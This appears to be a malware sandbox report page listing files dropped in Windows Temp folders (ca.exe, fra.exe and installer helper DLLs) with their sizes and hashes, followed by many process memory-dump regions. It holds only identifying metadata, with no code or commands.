a8c5a6949ec152eb7ecdc4518f6b927a4d7dbafbf98d79581aecb65fd0d086beef3df0e4bf0838e7c8d39f07f96b9af51db86d12c34408be3cca8863771520f3

Download Submit
\Users\Admin\AppData\Local\Temp\a\ca.exe

Filesize
497KB

MD5
659bbc5d7a40b34cd15cd156050aa049

SHA1
385d7a6ddb64e2ee5594ede43ae4fd4fb3a85678

SHA256
efd5137347051e0ea37fff40f2fd343aa80368861a119d43230bdc31e8600cf0

SHA512
dafc0ee06aa6174d88166d9181250db078f5a1c8dc72b7747e53963aaefda0b0cac779faf258c2f42d061f23edff9bb48a7b4d1b085addc957169678e09b6a50

Download Submit
\Users\Admin\AppData\Local\Temp\a\ca.exe

Filesize
497KB

MD5
659bbc5d7a40b34cd15cd156050aa049

SHA1
385d7a6ddb64e2ee5594ede43ae4fd4fb3a85678

SHA256
efd5137347051e0ea37fff40f2fd343aa80368861a119d43230bdc31e8600cf0

SHA512
dafc0ee06aa6174d88166d9181250db078f5a1c8dc72b7747e53963aaefda0b0cac779faf258c2f42d061f23edff9bb48a7b4d1b085addc957169678e09b6a50

Download Submit
\Users\Admin\AppData\Local\Temp\a\fra.exe

Filesize
496KB

MD5
ba3cc252387fd4f90201c371bd3e0190

SHA1
6796980637d3eb3dfe03c8951e4db9e581bc7181

SHA256
6b96f6652af99c513bbe89a4c5e61e2729aa1f67ce0c0c3d0ca28d2959dcd82c

SHA512
4c26b627d8fbdeb63673cda208914256980542389232b295866eef71ed01ad5392a3abb2d9098ec7e30f1bfb0f133425ca1c82d3ad9c25339c1feb3afdb71f77

Download Submit
\Users\Admin\AppData\Local\Temp\a\fra.exe

Filesize
496KB

MD5
ba3cc252387fd4f90201c371bd3e0190

SHA1
6796980637d3eb3dfe03c8951e4db9e581bc7181

SHA256
6b96f6652af99c513bbe89a4c5e61e2729aa1f67ce0c0c3d0ca28d2959dcd82c

SHA512
4c26b627d8fbdeb63673cda208914256980542389232b295866eef71ed01ad5392a3abb2d9098ec7e30f1bfb0f133425ca1c82d3ad9c25339c1feb3afdb71f77

Download Submit
\Users\Admin\AppData\Local\Temp\is-6G8MK.tmp\_iscrypt.dll

Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
\Users\Admin\AppData\Local\Temp\is-6G8MK.tmp\_isdecmp.dll

Filesize
12KB

MD5
7cee19d7e00e9a35fc5e7884fd9d1ad8

SHA1
2c5e8de13bdb6ddc290a9596113f77129ecd26bc

SHA256
58ee49d4b4f6def91c6561fc5a1b73bc86d8a01b23ce0c8ddbf0ed11f13d5ace

SHA512
a6955f5aff467f199236ed8a57f4d97af915a3ae81711ff8292e66e66c9f7ee307d7d7aafce09a1bd33c8f7983694cb207fc980d6c3323b475de6278d37bdde8

Download Submit
\Users\Admin\AppData\Local\Temp\is-6G8MK.tmp\_isdecmp.dll

Filesize
12KB

MD5
7cee19d7e00e9a35fc5e7884fd9d1ad8

SHA1
2c5e8de13bdb6ddc290a9596113f77129ecd26bc

SHA256
58ee49d4b4f6def91c6561fc5a1b73bc86d8a01b23ce0c8ddbf0ed11f13d5ace

SHA512
a6955f5aff467f199236ed8a57f4d97af915a3ae81711ff8292e66e66c9f7ee307d7d7aafce09a1bd33c8f7983694cb207fc980d6c3323b475de6278d37bdde8

Download Submit
\Users\Admin\AppData\Local\Temp\nsfD274.tmp\System.dll

Filesize
12KB

MD5
0d7ad4f45dc6f5aa87f606d0331c6901

SHA1
48df0911f0484cbe2a8cdd5362140b63c41ee457

SHA256
3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca

SHA512
c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

Download Submit
\Users\Admin\AppData\Local\Temp\nsfD274.tmp\nsis7z.dll

Filesize
424KB

MD5
80e44ce4895304c6a3a831310fbf8cd0

SHA1
36bd49ae21c460be5753a904b4501f1abca53508

SHA256
b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592

SHA512
c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

Download Submit
memory/652-0-0x0000000000B50000-0x0000000000B58000-memory.dmp

Filesize
32KB

Download
memory/652-38-0x000000001B810000-0x000000001B820000-memory.dmp

Filesize
64KB

Download
memory/652-1-0x00007FFDB9B50000-0x00007FFDBA53C000-memory.dmp

Filesize
9.9MB

Download
memory/652-2-0x000000001B810000-0x000000001B820000-memory.dmp

Filesize
64KB

Download
memory/652-34-0x00007FFDB9B50000-0x00007FFDBA53C000-memory.dmp

Filesize
9.9MB

Download
memory/712-416-0x00007FF66E8B0000-0x00007FF66EE51000-memory.dmp

Filesize
5.6MB

Download
memory/816-246-0x00000000004F0000-0x00000000004F2000-memory.dmp

Filesize
8KB

Download
memory/1020-222-0x0000000074070000-0x000000007475E000-memory.dmp

Filesize
6.9MB

Download
memory/1020-267-0x0000000074070000-0x000000007475E000-memory.dmp

Filesize
6.9MB

Download
memory/1020-219-0x0000000000870000-0x00000000009EE000-memory.dmp

Filesize
1.5MB

Download
memory/1324-238-0x0000000001F70000-0x0000000001FCA000-memory.dmp

Filesize
360KB

Download
memory/1324-248-0x0000000074070000-0x000000007475E000-memory.dmp

Filesize
6.9MB

Download
memory/1324-226-0x0000000000400000-0x000000000047E000-memory.dmp

Filesize
504KB

Download
memory/1324-384-0x0000000074070000-0x000000007475E000-memory.dmp

Filesize
6.9MB

Download
memory/1324-370-0x0000000000400000-0x000000000047E000-memory.dmp

Filesize
504KB

Download
memory/1348-237-0x0000000074070000-0x000000007475E000-memory.dmp

Filesize
6.9MB

Download
memory/1348-207-0x0000000074070000-0x000000007475E000-memory.dmp

Filesize
6.9MB

Download
memory/1348-205-0x00000000008B0000-0x000000000100C000-memory.dmp

Filesize
7.4MB

Download
memory/1456-413-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/1456-297-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/1956-965-0x00007FFDD6140000-0x00007FFDD6141000-memory.dmp

Filesize
4KB

Download
memory/2244-380-0x0000000000400000-0x0000000000627000-memory.dmp

Filesize
2.2MB

Download
memory/2244-389-0x0000000000400000-0x0000000000627000-memory.dmp

Filesize
2.2MB

Download
memory/2244-373-0x0000000000400000-0x0000000000627000-memory.dmp

Filesize
2.2MB

Download
memory/2604-527-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/3264-882-0x00000000030A0000-0x00000000030B6000-memory.dmp

Filesize
88KB

Download
memory/3264-371-0x0000000002F60000-0x0000000003098000-memory.dmp

Filesize
1.2MB

Download
memory/3264-406-0x0000000001100000-0x0000000001116000-memory.dmp

Filesize
88KB

Download
memory/3296-283-0x0000000000EA0000-0x0000000001D3D000-memory.dmp

Filesize
14.6MB

Download
memory/3296-374-0x0000000000EA0000-0x0000000001D3D000-memory.dmp

Filesize
14.6MB

Download
memory/3296-60-0x0000000000EA0000-0x0000000001D3D000-memory.dmp

Filesize
14.6MB

Download
memory/3380-375-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/3380-390-0x0000000074070000-0x000000007475E000-memory.dmp

Filesize
6.9MB

Download
memory/3624-436-0x0000000006A60000-0x0000000006AB0000-memory.dmp

Filesize
320KB

Download
memory/3624-29-0x00000000049C0000-0x00000000049FE000-memory.dmp

Filesize
248KB

Download
memory/3624-32-0x0000000005290000-0x00000000052DB000-memory.dmp

Filesize
300KB

Download
memory/3624-22-0x0000000004B40000-0x0000000005146000-memory.dmp

Filesize
6.0MB

Download
memory/3624-11-0x00000000005D0000-0x0000000000600000-memory.dmp

Filesize
192KB

Download
memory/3624-58-0x0000000000400000-0x0000000000454000-memory.dmp

Filesize
336KB

Download
memory/3624-18-0x0000000074070000-0x000000007475E000-memory.dmp

Filesize
6.9MB

Download
memory/3624-93-0x0000000074070000-0x000000007475E000-memory.dmp

Filesize
6.9MB

Download
memory/3624-25-0x0000000005150000-0x000000000525A000-memory.dmp

Filesize
1.0MB

Download
memory/3624-61-0x00000000060D0000-0x0000000006136000-memory.dmp

Filesize
408KB

Download
memory/3624-19-0x0000000002320000-0x0000000002326000-memory.dmp

Filesize
24KB

Download
memory/3624-41-0x00000000053E0000-0x0000000005456000-memory.dmp

Filesize
472KB

Download
memory/3624-8-0x0000000000400000-0x0000000000454000-memory.dmp

Filesize
336KB

Download
memory/3624-28-0x0000000004A30000-0x0000000004A40000-memory.dmp

Filesize
64KB

Download
memory/3624-27-0x0000000002400000-0x0000000002412000-memory.dmp

Filesize
72KB

Download
memory/3624-47-0x0000000005460000-0x00000000054F2000-memory.dmp

Filesize
584KB

Download
memory/4032-257-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/4032-391-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/4052-30-0x0000000074070000-0x000000007475E000-memory.dmp

Filesize
6.9MB

Download
memory/4052-31-0x0000000004C40000-0x000000000513E000-memory.dmp

Filesize
5.0MB

Download
memory/4052-21-0x00000000005A0000-0x00000000005B8000-memory.dmp

Filesize
96KB

Download
memory/4052-68-0x0000000074070000-0x000000007475E000-memory.dmp

Filesize
6.9MB

Download
memory/4052-20-0x0000000000400000-0x000000000043F000-memory.dmp

Filesize
252KB

Download
memory/4052-56-0x0000000077E8F000-0x0000000077E90000-memory.dmp

Filesize
4KB

Download
memory/4052-35-0x0000000004C30000-0x0000000004C40000-memory.dmp

Filesize
64KB

Download
memory/4052-67-0x0000000000400000-0x000000000043F000-memory.dmp

Filesize
252KB

Download
memory/4128-344-0x0000000074070000-0x000000007475E000-memory.dmp

Filesize
6.9MB

Download
memory/4128-309-0x00000000020B0000-0x000000000210A000-memory.dmp

Filesize
360KB

Download
memory/4128-306-0x0000000000400000-0x000000000047E000-memory.dmp

Filesize
504KB

Download
memory/4332-929-0x0000000000400000-0x0000000000627000-memory.dmp

Filesize
2.2MB

Download
memory/4332-395-0x0000000000400000-0x0000000000627000-memory.dmp

Filesize
2.2MB

Download
memory/4356-443-0x00000000001F0000-0x00000000001F1000-memory.dmp

Filesize
4KB

Download
memory/4356-328-0x00000000001F0000-0x00000000001F1000-memory.dmp

Filesize
4KB

Download
memory/4356-435-0x0000000000400000-0x00000000004CF000-memory.dmp

Filesize
828KB

Download
memory/4532-298-0x0000000000820000-0x00000000008CE000-memory.dmp

Filesize
696KB

Download
memory/4564-881-0x0000000000B00000-0x0000000000B2F000-memory.dmp

Filesize
188KB

Download
memory/4564-445-0x0000000000B00000-0x0000000000B2F000-memory.dmp

Filesize
188KB

Download
memory/4564-431-0x00000000011E0000-0x00000000011F7000-memory.dmp

Filesize
92KB

Download
memory/4564-426-0x00000000011E0000-0x00000000011F7000-memory.dmp

Filesize
92KB

Download
memory/4564-408-0x00000000011E0000-0x00000000011F7000-memory.dmp

Filesize
92KB

Download
memory/4624-301-0x000000001B4F0000-0x000000001B500000-memory.dmp

Filesize
64KB

Download
memory/4624-269-0x00007FFDB9B50000-0x00007FFDBA53C000-memory.dmp

Filesize
9.9MB

Download
memory/4624-266-0x0000000000980000-0x0000000000988000-memory.dmp

Filesize
32KB

Download
memory/4624-394-0x00007FFDB9B50000-0x00007FFDBA53C000-memory.dmp

Filesize
9.9MB

Download
memory/4624-396-0x000000001B4F0000-0x000000001B500000-memory.dmp

Filesize
64KB

Download
memory/4680-434-0x0000000000030000-0x000000000011A000-memory.dmp

Filesize
936KB

Download
memory/4680-438-0x0000000074070000-0x000000007475E000-memory.dmp

Filesize
6.9MB

Download
memory/4680-440-0x0000000004960000-0x000000000496A000-memory.dmp

Filesize
40KB

Download
memory/4940-437-0x0000000002040000-0x0000000002058000-memory.dmp

Filesize
96KB

Download
memory/4940-442-0x0000000000400000-0x000000000043F000-memory.dmp

Filesize
252KB

Download
memory/4976-917-0x0000019E8AC30000-0x0000019E8AC50000-memory.dmp

Filesize
128KB

Download
memory/4976-923-0x00007FF7BFE20000-0x00007FF7C0923000-memory.dmp

Filesize
11.0MB

Download
memory/4992-348-0x00000000006E0000-0x00000000006F4000-memory.dmp

Filesize
80KB

Download
memory/4992-369-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/4992-342-0x00000000009F0000-0x0000000000D10000-memory.dmp

Filesize
3.1MB

Download
memory/4992-278-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/5788-865-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download